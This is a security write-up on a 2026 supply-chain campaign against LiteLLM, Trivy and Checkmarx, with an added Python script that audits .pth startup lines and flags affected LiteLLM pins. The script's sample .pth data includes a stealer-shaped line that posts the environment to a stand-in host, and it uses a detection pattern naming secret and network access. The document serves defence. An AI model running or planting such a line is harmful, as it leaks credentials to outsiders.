AI supply‑chain attack

A sophisticated supply‑chain attack compromised LiteLLM, Trivy and Checkmarx in March 2026 and was used to steal CI/CD secrets and poison downstream AI systems — showing attackers can weaponize security tools to breach model pipelines. The incident is being framed as proof that AI infrastructure is now critical infrastructure, demanding continuous dependency validation and new defenses for non‑human identities and agentic systems. (blog.dreamfactory.com)

Security researchers attribute the campaign to the threat actor calling itself “TeamPCP,” which carried out a four‑wave supply‑chain campaign between March 19–24, 2026. (labs.cloudsecurityalliance.org) Aqua’s Trivy ecosystem was abused via compromises to trivy‑action, setup‑trivy and a v0.69.4 release, with malicious artifacts later appearing as Docker images tied to the same campaign. (wiz.io) LiteLLM versions 1.82.7 and 1.82.8 were published to PyPI on March 24, 2026 containing a .pth credential‑stealer, and those poisoned releases were publicly available for roughly five hours before removal. (kaspersky.co.uk) Checkmarx’s tooling was hit as well: researchers reported tampering of the KICS code scanner and OpenVSX/VS Code extensions including cx‑dev‑assist 1.7.0, broadening the pipeline attack surface. (darkreading.com) Analysts tied the malicious LiteLLM artifacts and Trivy compromises to exfiltration of CI/CD credentials and service‑account tokens that enabled Kubernetes‑wide persistence and lateral movement in some environments. (thehackernews.com) Microsoft published a detailed detection, investigation and remediation guide on March 24, 2026, while LiteLLM and multiple security vendors have published incident notices and IoCs to support hunts and rollbacks. (microsoft.com)
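The LiteLLM detail worth understanding as a defender is the `.pth` mechanism: Python's `site` module executes any line in a site-packages `.pth` file that begins with `import`, at every interpreter start, which is why a poisoned wheel can run a stealer without the application ever importing the package. The script below is an added example (not code from the incident notices or from any vendor) that audits the `.pth` files in your site-packages directories for such exec lines and flags the ones that touch the environment, network or subprocesses, and separately checks a requirements file for the two LiteLLM release versions named above. The sample `.pth` content and requirements text are constructed for the example, and the `AFFECTED_PINS` table and the suspicious-keyword heuristic are this example's own assumptions, not an official IoC list.

```python
"""Audit site-packages .pth files for startup-executed lines, and check pins
against known-affected releases. Added defender example; not vendor code."""
import re
import site
from pathlib import Path
from typing import Iterable

# site.py exec()s any .pth line that starts with "import " or "import\t";
# every other non-blank, non-comment line is simply appended to sys.path.
_EXEC_LINE = re.compile(r"^import[ \t]")

# Assumed check list built from the versions named in the write-up above.
AFFECTED_PINS = {"litellm": {"1.82.7", "1.82.8"}}

# Heuristic: exec lines that reach for secrets, the network or a shell.
_SUSPICIOUS = re.compile(
    r"os\.environ|getenv|urllib|socket|requests|subprocess|base64|exec\(")


def audit_pth_text(name: str, text: str) -> list[dict]:
    """Return one finding per .pth line that Python would execute on startup."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.rstrip("\r\n")
        if not line.strip() or line.startswith("#"):
            continue  # comments and blank lines are ignored by site.py
        if _EXEC_LINE.match(line):
            findings.append({
                "file": name,
                "line": lineno,
                "code": line,
                # Every exec line deserves review; editable-install hooks are
                # common, so only escalate the ones matching the heuristic.
                "suspicious": bool(_SUSPICIOUS.search(line)),
            })
    return findings


def audit_site_packages(dirs: Iterable[str]) -> list[dict]:
    """Walk the given site-packages directories and audit every .pth found."""
    findings = []
    for d in dirs:
        for pth in sorted(Path(d).glob("*.pth")):
            try:
                text = pth.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            findings.extend(audit_pth_text(str(pth), text))
    return findings


def flag_affected_pins(requirements_text: str) -> list[str]:
    """Return 'name==version' pins that match a known-affected release."""
    hits = []
    for raw in requirements_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"^([A-Za-z0-9_.\-]+)\s*==\s*([0-9][^\s;]*)", line)
        if not m:
            continue
        name, version = m.group(1).lower().replace("_", "-"), m.group(2)
        if version in AFFECTED_PINS.get(name, set()):
            hits.append(f"{name}=={version}")
    return hits


# Constructed sample .pth: a path entry, a benign editable-install hook, and
# an exec line of the shape a startup stealer needs (points at example.invalid).
SAMPLE_PTH = """\
# benign path entry
/opt/app/src
import sys; sys.path.insert(0, '/opt/app/editable')
import os, urllib.request; urllib.request.urlopen('https://example.invalid/', data=repr(os.environ).encode())
"""

# Constructed requirements text containing one affected pin.
SAMPLE_REQUIREMENTS = """\
litellm==1.82.7
requests==2.32.3
"""

if __name__ == "__main__":
    dirs = site.getsitepackages() + [site.getusersitepackages()]
    for f in audit_site_packages(dirs):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"[{flag}] {f['file']}:{f['line']}: {f['code'][:120]}")
    for pin in flag_affected_pins(SAMPLE_REQUIREMENTS):
        print(f"[AFFECTED] {pin}")
```

Run it inside each CI runner image or virtual environment that installed packages during the exposure window; any `.pth` exec line you did not put there yourself is worth pulling for analysis, and matching pins should be rolled back and the runner's credentials rotated per the vendor guidance cited above.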
